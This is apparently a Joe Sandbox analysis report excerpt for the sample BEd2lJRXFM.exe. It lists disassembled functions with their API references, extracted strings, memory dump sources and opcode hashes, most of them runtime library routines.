Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
Instruction ID: 12d1ad5acca3a230a4014d0cfece372d21223487b5c98b8b168eb06ab3590b9b
Opcode Fuzzy Hash: adaab86243d259393613f04f27d957ce20d16d85c081b3fe77030dc48aa8ee98
Instruction Fuzzy Hash: A6E0EC79A13334AA96366F18BD40449FF69FBD8B143850076E52112230C73A2553ABCE

Function 00410A46 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00410A4F

Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA

_free.LIBCMT ref: 00410A62
_free.LIBCMT ref: 00410A73
_free.LIBCMT ref: 00410A84

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7b30c710dcdd7188d0b07851f7036ca18a8931f72254c168f329d64b926ff840
Instruction ID: 4f604ca58aada12d27b251242fa97a7c83cac521b99ee6611507b97af23f288b
Opcode Fuzzy Hash: 7b30c710dcdd7188d0b07851f7036ca18a8931f72254c168f329d64b926ff840
Instruction Fuzzy Hash: 46E0EC71B13360AA8632AF15BD41589FFA1EFD4B543C9003BF50812631D73909939BCE

Function 0040F8ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0040F97D

Strings

pow, xrefs: 0040F955, 0040F972

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 31981e0ef883c4d92876c0cf8fbbce67339a08b3983a5bf5b0a922faacb7e412
Instruction ID: a4333340e488540e58a7cc811cab45b4078f0fd2139a3ee8952107b79a1fd4b1
Opcode Fuzzy Hash: 31981e0ef883c4d92876c0cf8fbbce67339a08b3983a5bf5b0a922faacb7e412
Instruction Fuzzy Hash: C15190B1B08601E6CB317718C9413EB6BD09B80701F64497BE495527E9EB3C8CDA9E8F

Function 04B603E4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\BEd2lJRXFM.exe, xrefs: 04B60427, 04B6042E, 04B60464

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\Desktop\BEd2lJRXFM.exe
API String ID: 0-1817753410
Opcode ID: 9c4445743612698079b74687b6d690de0a76c3e5134965afe2d5fa7eb50f9b57
Instruction ID: 6ec61ae776d91ba0ec407f097d746dd00b1021db5fd28e89e15f9edbca5c8fa0
Opcode Fuzzy Hash: 9c4445743612698079b74687b6d690de0a76c3e5134965afe2d5fa7eb50f9b57
Instruction Fuzzy Hash: CA416871B00218AFDB25EF9EDC809AEBBB9EFC5314B1000F6E906D7251E774AA41CB54

Function 0041017D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\BEd2lJRXFM.exe, xrefs: 004101C0, 004101C7, 004101FD

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\BEd2lJRXFM.exe
API String ID: 0-1817753410
Opcode ID: 071b538174e6ec2062faa24906a4cfa7e50636e93d54360a723864c0abc3d007
Instruction ID: ef1b21c86d4c641325268a2e562e5aacaa8476dc5588200f607cc18d3bf73bc2
Opcode Fuzzy Hash: 071b538174e6ec2062faa24906a4cfa7e50636e93d54360a723864c0abc3d007
Instruction Fuzzy Hash: A8416471E00214ABCB219B999C85AEFBBF8EFD4350B1440ABF50497251D7B99EC1CB98

Function 04B5AE47 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 04B5AE86
__IsNonwritableInCurrentImage.LIBCMT ref: 04B5AF3A

Strings

csm, xrefs: 04B5AF24

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
Instruction ID: 70e8698bee852924f5bb584f04452ba236da7fcfa1c8d49e128eb9e6af04e50f
Opcode Fuzzy Hash: 33bf7593fb2420a6276facfce688e1aeeae85943ba4b5033adcc5dff2c976554
Instruction Fuzzy Hash: F941A270A002189BCF10DF68C884BAEFFB5EF49318F148695EC19AB261D735BA15CB91

Function 100044D6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 100044FB

Strings

MOC, xrefs: 1000450D
RCC, xrefs: 10004515

Memory Dump Source

Source File: 00000000.00000002.2663377241.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2663360620.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663397984.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2663415444.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_BEd2lJRXFM.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
Instruction ID: 0fa13f4c886c2deeb8e1184eea68dc96f9460117e0f406c7378fe553058e7938
Opcode Fuzzy Hash: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
Instruction Fuzzy Hash: 7B419DB5900109AFEF06CF94CC81AEE7BB5FF48384F168059F9046B25AD736EA50CB55

Function 04B5B6EC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 04B5B711

Strings

MOC, xrefs: 04B5B723
RCC, xrefs: 04B5B72B

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
Instruction ID: 2212925fe134cc2111ecafa736f2afae502ae44490f92b2f165d5a2064985c51
Opcode Fuzzy Hash: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
Instruction Fuzzy Hash: 28413572900209AFDF16DF98C881AEEBBB5FF48304F188199FD15AB261D335B950DB64

Function 0040B485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 0040B4AA

Strings

RCC, xrefs: 0040B4C4
MOC, xrefs: 0040B4BC

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
Instruction ID: 67f376c023d9800a5206fdaf198d645220277734bcfb559d46511f35e7f4eabb
Opcode Fuzzy Hash: 16a00d9b10077e87a2e6bda56ac5cedb43e1d1180fe444446107c7dbba074086
Instruction Fuzzy Hash: 95415871900209AFDF15DF94CD81AAEBBB5EF48308F1480AAFA1576291D3399A50DB98

Function 04D00730 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 04D007BB

Strings

NE]D, xrefs: 04D00750
FEKN, xrefs: 04D0078A

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID: Init_thread_footer
String ID: FEKN$NE]D
API String ID: 1385522511-517842756
Opcode ID: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
Instruction ID: eeb1f5cec2549553920e85b7a9247d1e6a03911fec61ecc508c211246d055250
Opcode Fuzzy Hash: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
Instruction Fuzzy Hash: 4E214B30B00645DBE730DF28F845BA877A0FB85304F948268D8141B291DBB57685CBD9

Function 04B51597 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 04B593D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B593E2
Part of subcall function 04B593D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B5941F

__Init_thread_footer.LIBCMT ref: 04B51622

Part of subcall function 04B5938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B59397
Part of subcall function 04B5938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B593CA

Strings

NE]D, xrefs: 04B515B7
FEKN, xrefs: 04B515F1

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer
String ID: FEKN$NE]D
API String ID: 4132704954-517842756
Opcode ID: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
Instruction ID: 3c1b778216039be24e69e93469c3dc91a6664500329f4febd1c30c6ecfce7c70
Opcode Fuzzy Hash: 7d1b909681db53285071ff40672d1c380c008a281c48190cd621e0695607241e
Instruction Fuzzy Hash: DF215C70B00245CBE720DF28E8457A5B7A0EF95304F9442A5DC151B271E7B53586C7CD

Function 00401330 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8

__Init_thread_footer.LIBCMT ref: 004013BB

Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA

Strings

FEKN, xrefs: 0040138A
NE]D, xrefs: 00401350

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
String ID: FEKN$NE]D
API String ID: 2296764815-517842756
Opcode ID: 37e1153e5d0601956be4df5595081ba34075aac515f72f9cd57d9b237f69f675
Instruction ID: bb411daeb84ba6cc8782813aab56c5dc80a7b29e6052d91cba9c4b608feb04e2
Opcode Fuzzy Hash: 37e1153e5d0601956be4df5595081ba34075aac515f72f9cd57d9b237f69f675
Instruction Fuzzy Hash: 51215C30B00245CBD720CF29E846BA977B0FB95304F94427AD8542B7A3DBB92586C7DD

Function 04D070C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 04D0712E

Strings

_DC[, xrefs: 04D070D7
CD^O, xrefs: 04D070E0

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID: Init_thread_footer
String ID: CD^O$_DC[
API String ID: 1385522511-3597986494
Opcode ID: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
Instruction ID: 87462baebe883bc4e82ade37a6a1995d5a11c17ae61d0f2918f05a8faf5b65cf
Opcode Fuzzy Hash: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
Instruction Fuzzy Hash: 7301D631F00605DBC720FF69BD40A69B3B4F755304F988179E5145B2C0EB74A9459BDA

Function 04D06B00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 04D06B6E

Strings

_DC[, xrefs: 04D06B17
CD^O, xrefs: 04D06B20

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID: Init_thread_footer
String ID: CD^O$_DC[
API String ID: 1385522511-3597986494
Opcode ID: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
Instruction ID: 4a199b459e3e2825e1bd385b986a8a9a79fd366959a413756b526a92eaea05fe
Opcode Fuzzy Hash: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
Instruction Fuzzy Hash: 1301D1B1F00608DBC720FFA8BD40B69B7B4F709314F90C2A9E51957290EB74A9459B9A

Function 04B57F27 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 04B593D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B593E2
Part of subcall function 04B593D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B5941F

__Init_thread_footer.LIBCMT ref: 04B57F95

Part of subcall function 04B5938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B59397
Part of subcall function 04B5938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B593CA

Strings

CD^O, xrefs: 04B57F47
_DC[, xrefs: 04B57F3E

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer
String ID: CD^O$_DC[
API String ID: 4132704954-3597986494
Opcode ID: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
Instruction ID: 73845b54778f2b056d5136dc63a789871d4a557b4a36b63bea2f8ee065012b97
Opcode Fuzzy Hash: f117a8599e5a5b64357cd679555c90fdeb56fb08607ed05f2cce84a05c41c654
Instruction Fuzzy Hash: 07012670B00304DBC720EF69BD00AA9B3A4EB48304F9801B9D92947260DB74A4458FC9

Function 04B57967 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 04B593D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B593E2
Part of subcall function 04B593D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B5941F

__Init_thread_footer.LIBCMT ref: 04B579D5

Part of subcall function 04B5938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B59397
Part of subcall function 04B5938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B593CA

Strings

CD^O, xrefs: 04B57987
_DC[, xrefs: 04B5797E

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer
String ID: CD^O$_DC[
API String ID: 4132704954-3597986494
Opcode ID: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
Instruction ID: e1bb5d90f00d17a6e7e6a5c64c2046bb9bd3a1fb38832ff7038006b13d2d2031
Opcode Fuzzy Hash: a0a846a2b5bc40eacf458633a07b7fd0d6dae78898cee81696ac0ea38ef941e0
Instruction Fuzzy Hash: BD0149B0B00208DBDB20FF68BD40B5DB3B0EB08314F8082EAD919472A0DB747445CBC9

Function 00407CC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8

__Init_thread_footer.LIBCMT ref: 00407D2E

Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA

Strings

_DC[, xrefs: 00407CD7
CD^O, xrefs: 00407CE0

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
String ID: CD^O$_DC[
API String ID: 2296764815-3597986494
Opcode ID: 53c53f0d35d6ef20f9dfb6d629afc077c30de4eaa3ac919fd52d2abd114ead8e
Instruction ID: 8bf2ad3165393ed28199ca71651b1e02a490a28405ec2f0c6d2e7b73ba48d91c
Opcode Fuzzy Hash: 53c53f0d35d6ef20f9dfb6d629afc077c30de4eaa3ac919fd52d2abd114ead8e
Instruction Fuzzy Hash: 1C012630F002059BC720EF6AAD0196973B4FB59300B84017AE5146B282E77899428BDE

Function 00407700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8

__Init_thread_footer.LIBCMT ref: 0040776E

Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA

Strings

_DC[, xrefs: 00407717
CD^O, xrefs: 00407720

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
String ID: CD^O$_DC[
API String ID: 2296764815-3597986494
Opcode ID: 6984f13f36b3e6cee961cec358f898ccc9f9a1464559edccbb98c4c3ae659da9
Instruction ID: 44c7e97e152ec1ca5567fde67ff81d8d8e81e117548a1af78ec12ab7f1e6b2a3
Opcode Fuzzy Hash: 6984f13f36b3e6cee961cec358f898ccc9f9a1464559edccbb98c4c3ae659da9
Instruction Fuzzy Hash: 64012670F002089BC720FF69AD41A5973B0E708350F80827EE5196B292EB786941CBCA

Function 04D064B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 04D06519

Strings

EDO*, xrefs: 04D064CD
DCDO, xrefs: 04D064C6

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID: Init_thread_footer
String ID: DCDO$EDO*
API String ID: 1385522511-3480089779
Opcode ID: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
Instruction ID: 5436fa2942819c148a1ad928f8eb481a4615287eccf74388cdf14aeca9b14160
Opcode Fuzzy Hash: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
Instruction Fuzzy Hash: EE01D6B0F01608DFC720EFA4E88565CB7B0E705304F908579DA0557390DB34B9818B99

Function 04D065C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 04D06629

Strings

DCDO, xrefs: 04D065D6
^]E*, xrefs: 04D065DD

Memory Dump Source

Source File: 00000000.00000003.1995658163.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_4d00000_BEd2lJRXFM.jbxd

Similarity

API ID: Init_thread_footer
String ID: DCDO$^]E*
API String ID: 1385522511-2708296792
Opcode ID: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
Instruction ID: 61beb21e281c2313f5cf4664c039b3e45e60a1e1d6ebb2684f968f147f531c84
Opcode Fuzzy Hash: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
Instruction Fuzzy Hash: 61016D70F00208ABC720EF68E94666CBBB0FB04704F9481BAD91997394DF35B9259B99

Function 04B57427 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 04B593D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B593E2
Part of subcall function 04B593D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B5941F

__Init_thread_footer.LIBCMT ref: 04B57490

Part of subcall function 04B5938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B59397
Part of subcall function 04B5938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B593CA

Strings

DCDO, xrefs: 04B5743D
^]E*, xrefs: 04B57444

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer
String ID: DCDO$^]E*
API String ID: 4132704954-2708296792
Opcode ID: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
Instruction ID: 437906388b61fe943357bd326f5e1a2ede15cdd2461330538d957623801f8a7b
Opcode Fuzzy Hash: 39631913317fdbbebfa06f582ff08a226458685357f22e00fc86a48f968bd657
Instruction Fuzzy Hash: 6C0162B0B00208DBD720EF68E95265CFBB4EB04704F9441BADD19573A0DB3579158FD9

Function 04B57317 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 04B593D7: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B593E2
Part of subcall function 04B593D7: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B5941F

__Init_thread_footer.LIBCMT ref: 04B57380

Part of subcall function 04B5938D: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 04B59397
Part of subcall function 04B5938D: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 04B593CA

Strings

DCDO, xrefs: 04B5732D
EDO*, xrefs: 04B57334

Memory Dump Source

Source File: 00000000.00000002.2662270643.0000000004B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4b50000_BEd2lJRXFM.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer
String ID: DCDO$EDO*
API String ID: 4132704954-3480089779
Opcode ID: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
Instruction ID: 87e41e0b2f9597b44a57a598c6086e4c7b239a4d94fb22646f4d4381699c326c
Opcode Fuzzy Hash: 8b51cd775da556fe0e8da68bd1a71e78c45c54a650ae96054a820cef77246584
Instruction Fuzzy Hash: B3014FB0B01208DBDB10DF54E98169CB7A0EB05714F9041B9DE16573A0DB3479858B89

Function 004070B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8

__Init_thread_footer.LIBCMT ref: 00407119

Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA

Strings

EDO*, xrefs: 004070CD
DCDO, xrefs: 004070C6

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
String ID: DCDO$EDO*
API String ID: 2296764815-3480089779
Opcode ID: 057ee43e4521391655df31a4c43a3f0a7f6c0038db3df444a4ed800121ff4de1
Instruction ID: 6e88f7cd3849569d85f07cd18ee47690fbb1a730dcdea08f10a2250dba35ba50
Opcode Fuzzy Hash: 057ee43e4521391655df31a4c43a3f0a7f6c0038db3df444a4ed800121ff4de1
Instruction Fuzzy Hash: 1F0186B0F01208AFC710DF55E98255DB7B0E705304F90457ADA15AB3D1DB386D95CB8D

Function 004071C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00409170: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 0040917B
Part of subcall function 00409170: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 004091B8

__Init_thread_footer.LIBCMT ref: 00407229

Part of subcall function 00409126: RtlEnterCriticalSection.NTDLL(0042AF64), ref: 00409130
Part of subcall function 00409126: RtlLeaveCriticalSection.NTDLL(0042AF64), ref: 00409163
Part of subcall function 00409126: RtlWakeAllConditionVariable.NTDLL ref: 004091DA

Strings

DCDO, xrefs: 004071D6
^]E*, xrefs: 004071DD

Memory Dump Source

Source File: 00000000.00000002.2659964109.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2659964109.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_BEd2lJRXFM.jbxd

Similarity

API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
String ID: DCDO$^]E*
